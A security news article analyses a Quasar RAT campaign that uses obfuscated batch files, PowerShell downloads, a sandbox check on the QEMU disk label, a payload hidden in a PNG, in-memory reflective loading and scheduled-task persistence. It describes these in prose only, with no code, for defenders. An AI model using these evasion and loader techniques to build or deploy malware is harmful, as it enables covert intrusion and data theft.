Security researchers have noted a resurgence of Quasar RAT campaigns leveraging highly obfuscated Windows batch files as initial loaders.
Quasar RAT has been a persistent threat in the cyber landscape due to its open-source development model, versatility, and broad capabilities for remote access.
This analysis explores the technical methods used by cybercriminals, shedding light on their multi-stage tactics and evasion techniques centered on BAT file abuse and advanced scripting.
Technical Anatomy Of The Quasar RAT BAT Campaign
The infection chain usually begins with the delivery of a misleading BAT file, cloaked in legitimacy with filenames suggesting office-related documentation or agreements.
Upon execution, the batch file opens a decoy Office document to create a veneer of authenticity for the victim.
Simultaneously, it leverages PowerShell to silently download a second-stage BAT file from a remote hosting server.
The initial BAT script demonstrates its dual role distracting the user and initiating the stealthy retrieval and execution of malware.
By using PowerShell commands embedded in the script, attackers avoid direct download commands that might be flagged by security controls, ensuring the secondary payload is delivered with minimal risk of detection.
Once downloaded, the second-stage BAT file takes center stage. It is constructed with dense obfuscation, utilizing a myriad of environment variables and strategic use of labels and goto statements.
These techniques scatter the malicious logic in fragments throughout the script, making it extremely challenging for static analysis engines to piece together the complete behavior.
Variables are assembled at runtime, gradually reconstructing the malicious actions in memory.
A particularly notable innovation in this campaign is the use of anti-sandbox and anti-analysis checks.
The malware executes a PowerShell command to inspect the system’s primary disk label.
If strings such as QEMU HARDDISK a common indicator of virtualized sandbox environments are detected, the script immediately terminates, ensuring that its true payload is only delivered on genuine, physical victim machines.
This clever strategy prevents automated analysis and allows attackers to operate more covertly.
The actual malware dropper then uses PowerShell yet again, this time to retrieve a PNG file masquerading as an image from an external file hosting service.
- Contrary to its appearance, this PNG contains encrypted, base64-encoded data representing the malicious Quasar RAT binary.
- The script decrypts the payload using a statically embedded cryptographic key and decompresses it with GZip.
- It then verifies the integrity of the payload via SHA256 hash comparison, further ensuring only the intended binary is executed.
With modern fileless malware techniques, the payload is never written to disk.
Instead, fully decrypted in memory, it is reflectively loaded into the current process using .NET reflection methods.
Such fileless injection is highly evasive, as no new files are dropped to the filesystem for security solutions to intercept.
Evasion And Persistence Through Advanced Scripting
This campaign is marked by multiple layers of evasion, not only through obfuscation and sandbox detection, but also through memory-only execution.
The attackers make extensive use of PowerShell to obfuscate the payload’s download and decryption processes, splitting logic across numerous environment variables to further complicate reverse engineering.
The use of image files for payload delivery helps bypass security tools that do not deeply inspect the data content of common file formats.
After establishing a foothold with Quasar RAT, the malware ensures persistence by creating a Windows scheduled task.
This allows the RAT to survive reboots and maintain long-term access, silently exfiltrating data or enabling further malicious activity at the attackers’ command.
Scheduled tasks are created using pre-written XML configuration files, further blending malicious activity within legitimate system functions.
The observed BAT-to-PowerShell delivery model, coupled with creative obfuscation and highly targeted execution logic, represents a significant evolution in commodity malware tactics.
By distributing their operations across multiple lightweight scripts, leveraging trusted system tools like PowerShell, and using multi-stage decryption and injection routines, threat actors behind Quasar RAT are achieving high rates of detection evasion and successful compromise.
Defenders are urged to look beyond signature-based detection and adopt behavioral analytics capable of correlating suspicious script execution, unusual environment variable usage, and memory-based process injection.
As the Quasar RAT campaign demonstrates, well-crafted BAT scripts can be just as sophisticated and dangerous as custom malware droppers written in compiled languages.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
